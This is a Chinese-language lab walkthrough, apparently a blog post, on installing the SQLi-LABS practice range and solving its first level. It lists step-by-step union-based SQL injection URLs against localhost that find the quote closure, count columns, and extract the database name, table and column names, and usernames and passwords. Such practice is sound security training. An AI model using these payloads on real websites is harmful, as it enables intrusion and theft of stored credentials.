一、靶场安装
1.在小皮面板中启动WAMP框架
2.修改PHP版本为5.4.45。
3.打开网站根目录。
4.将靶场的文件解压后,全部粘贴在根目录下
5.修改网站根目录下的“sql-connections/db-creds.inc”的内容,以记事本打开,输入你的MySQL的密码。
6.输入本机回环地址127.0.0.1,点击SQLi-LABS Page-1(Basic Challenges)安装靶场
6.安装完成后,如图所示。
二、靶场练习
第一关
1.判断闭合方式
报错说明注入参数后任有语句
闭合如下
127.0.01/Less-1/?id=1' --+
2.判断列数
依次输入以下网址进行判断
127.0.01/Less-1/?id=1' order by 1 --+
127.0.01/Less-1/?id=1' order by 2 --+
127.0.01/Less-1/?id=1' order by 3 --+
127.0.01/Less-1/?id=1' order by 4 --+
测试出有三列。
3.联合查询各列
127.0.0.1/Less-1/?id=1‘union select 1,2,3 --+
4.查找回显点
127.0.0.1/Less-1/?id=-1‘union select 1,2,3 --+
5.联合查询了数据库名和用户
127.0.0.1/Less-1/?id=-1'union select 1,database(),user()--+
6.联合查询网站数据库中所有表
127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
7.联合查询 查出users表里面的所有列
127.0.0.1/Less-1/?id=-1
' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
8.查询表中所有的数据
127.0.0.1/Less-1/?id=-1
' union select 1,2,group_concat(id,username,password) from users --+
通关!完结撒花!!!